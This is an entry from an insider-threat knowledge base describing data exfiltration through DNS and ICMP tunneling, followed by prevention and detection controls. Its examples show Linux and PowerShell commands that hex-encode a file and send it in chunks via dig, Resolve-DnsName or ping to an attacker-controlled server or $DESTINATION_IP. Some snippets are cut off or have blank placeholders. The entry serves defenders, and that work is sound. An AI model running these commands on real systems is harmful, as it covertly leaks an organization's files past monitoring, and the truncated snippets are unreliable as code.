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Insider Threat Matrix™

  • ID: IF004.005
  • Created: 31st July 2024
  • Updated: 31st July 2024
  • Platforms: Windows, Linux, MacOS
  • Contributors: Ismael Briones-Vilar, James Weston

Exfiltration via Protocol Tunneling

A subject exfiltrates data from an organization by encapsulating or hiding it within an otherwise legitimate protocol. This technique allows the subject to covertly transfer data, evading detection by standard security monitoring tools. Commonly used protocols, such as DNS and ICMP, are often leveraged to secretly transmit data to an external destination.

DNS Tunneling (Linux)
A simple example of how DNS tunneling might be achieved with 'Living off the Land' binaries (LoLBins) in Linux:


  • A domain the subject controls or can use for DNS queries.
  • A DNS server to receive and decode the DNS queries.



1. The subject uses xxd to create a hex dump of the file they wish to exfiltrate. For example, if the file is secret.txt:


xxd -p secret.txt > secret.txt.hex

2. The subject splits the hexdump into manageable chunks that can fit into DNS query labels (each label can be up to 63 characters, but it’s often safe to use a smaller size, such as 32 characters):


split -b 32 secret.txt.hex hexpart_


3. The subject uses dig to send the data in DNS TXT queries. Looping through the split files and sending each chunk as the subdomain of in a TXT record query:


for part in hexpart_*; do
   h=$(cat $part)
   dig txt $


On the target DNS server that they control, the subject captures the incoming DNS TXT record queries on the receiving DNS server and decode the reassembled hex data from the subdomain of the query.


DNS Tunneling (Windows)
A simple example of how DNS tunneling might be achieved with PowerShell in Windows:



  • A the subject you controls.
    A DNS server or a script on the subjects server to capture and decode the DNS queries.


1. The subject converts the sensitive file to hex:


$filePath = "C:\path\to\your\secret.txt"
$hexContent = [System.BitConverter]::ToString([System.IO.File]::ReadAllBytes($filePath)) -replace '-', ''


2. The subject splits the hex data into manageable chunks that can fit into DNS query labels (each label can be up to 63 characters, but it’s often safe to use a smaller size, such as 32 characters):


$chunkSize = 32
$chunks = $hexContent -split "(.{$chunkSize})" | Where-Object { $_ -ne "" }


3. The subject sends the data in DNS TXT queries. Looping through the hex data chunks and sending each chunk as the subdomain of in a TXT record query:


$domain = ""

foreach ($chunk in $chunks) {
   $query = "$chunk.$domain"
   Resolve-DnsName -Name $query -Type TXT


The subject will capture the incoming DNS TXT record queries on the receiving DNS server and decode the reassembled hex data from the subdomain of the query.


ICMP Tunneling (Linux)
A simple example of how ICMP tunneling might be achieved with 'Living off the Land' binaries (LOLBins) in Linux:


  • The subject has access to a server that can receive and process ICMP packets.
  • The subject has root privileges on both client and server machines (as ICMP usually requires elevated permissions).



1. The subject uses xxd to create a hex dump of the file they wish to exfiltrate. For example, if the file is secret.txt:


xxd -p secret.txt > secret.txt.hex


2. The subject splits the hexdump into manageable chunks. ICMP packets have a payload size limit, so it’s common to use small chunks. The following command will split the hex data into 32-byte chunks:

split -b 32 secret.txt.hex hexpart_


3. The subject uses ping to send the data in ICMP echo request packets. Loop through the split files and send each chunk as part of the ICMP payload:

for part in hexpart_*; do
   h=$(cat $part)
   ping -c 1 -p "$h" $DESTINATION_IP


The subject will capture the incoming ICMP packets on the destination server, extract the data from the packets and decode the reassembled the hex data.


ID Name Description
PV032Next-Generation Firewalls

Next-generation firewall (NGFW) network appliances and services provide the ability to control network traffic based on rules. These firewalls provide basic firewall functionality, such as simple packet filtering based on static rules and track the state of network connections. They can also provide the ability to control network traffic based on Application Layer rules, among other advanced features to control network traffic.


A example of simple functionality would be blocking network traffic to or from a specific IP address, or all network traffic to a specific port number. An example of more advanced functionality would be blocking all network traffic that appears to be SSH or FTP traffic to any port on any IP address.

PV034Protocol Allow Listing

Only allow necessary protocols to communicate over the network. Implement strict access controls to prevent unauthorized protocols from being used. Typically these controls would be implemented on next-generation firewalls with Deep Packet Inspection (DPI) and other network security appliances.


ID Name Description
DT046Agent Capable of Endpoint Detection and Response

An agent capable of Endpoint Detection and Response (EDR) is a software agent installed on organization endpoints (such as laptops and servers) that (at a minimum) records the Operating System, application, and network activity on an endpoint.


Typically EDR operates in an agent/server model, where agents automatically send logs to a server, where the server correlates those logs based on a rule set. This rule set is then used to surface potential security-related events, that can then be analyzed.


An EDR agent typically also has some form of remote shell capability, where a user of the EDR platform can gain a remote shell session on a target endpoint, for incident response purposes. An EDR agent will typically have the ability to remotely isolate an endpoint, where all network activity is blocked on the target endpoint (other than the network activity required for the EDR platform to operate).

DT045Agent Capable of User Activity Monitoring

An agent capable of User Activity Monitoring (UAM) is a software agent installed on organization endpoints (such as laptops); typically, User Activity Monitoring agents are only deployed on endpoints where a human user Is expected to conduct the activity.


The User Activity Monitoring agent will typically record Operating System, application, and network activity occurring on an endpoint, with a focus on activity that is or can be conducted by a human user. The purpose of this monitoring is to identify undesirable and/or malicious activity being conducted by a human user (in this context, an Insider Threat).


Typical User Activity Monitoring platforms operate in an agent/server model where activity logs are sent to a server for automatic correlation against a rule set. This rule set is used to surface activity that may represent Insider Threat related activity such as capturing screenshots, copying data, compressing files or installing risky software.


Other platforms providing related functionality are frequently referred to as User Behaviour Analytics (UBA) platforms.

DT047Agent Capable of User Behaviour Analytics

An agent capable of User Behaviour Analytics (UBA) is a software agent installed on organizational endpoints (such as laptops). Typically, User Activity Monitoring agents are only deployed on endpoints where a human user is expected to conduct the activity.


The User Behaviour Analytics agent will typically record Operating System, application, and network activity occurring on an endpoint, focusing on activity that is or can be conducted by a human user. Typically, User Behaviour Analytics platforms operate in an agent/server model where activity logs are sent to a server for automatic analysis. In the case of User Behaviour Analytics, this analysis will typically be conducted against a baseline that has previously been established.


A User Behaviour Analytic platform will typically conduct a period of ‘baselining’ when the platform is first installed. This baselining period establishes the normal behavior parameters for an organization’s users, which are used to train a Machine Learning (ML) model. This ML model can then be later used to automatically identify activity that is predicted to be an anomaly, which is hoped to surface user behavior that is undesirable, risky, or malicious.


Other platforms providing related functionality are frequently referred to as User Activity Monitoring (UAM) platforms.

DT097Deep Packet Inspection

Implement Deep Packet Inspection (DPI) tools to inspect the content of network packets beyond the header information. DPI can identify unusual patterns and hidden data within legitimate protocols. DPI can be conducted with a range of software and hardware solutions, such as Unified Threat Management (UTM) and Next-Generation Firewalls (NGFWs), as well as Intrusion Detection and Prevention Systems (IDPS) such as Snort and Suricata, 

DT096DNS Monitoring

Monitor outbound DNS traffic for unusual or suspicious queries that may indicate DNS tunneling. DNS monitoring entails observing and analyzing Domain Name System (DNS) queries and responses to identify abnormal or malicious activities. This can be achieved using various security platforms and network appliances, including Network Intrusion Detection Systems (NIDS), specialized DNS services, and Security Information and Event Management (SIEM) systems that process DNS logs.

DT098NetFlow Analysis

Analyze network flow data (NetFlow) to identify unusual communication patterns and potential tunneling activities. Flow data offers insights into the volume, direction, and nature of traffic.


NetFlow, a protocol developed by Cisco, captures and records metadata about network flows—such as source and destination IP addresses, ports, and the amount of data transferred.


Various network appliances support NetFlow, including Next-Generation Firewalls (NGFWs), network routers and switches, and dedicated NetFlow collectors.

DT042Network Intrusion Detection Systems

Network Intrusion Detection Systems (NIDS) can alert on abnormal, suspicious, or malicious patterns of network behavior.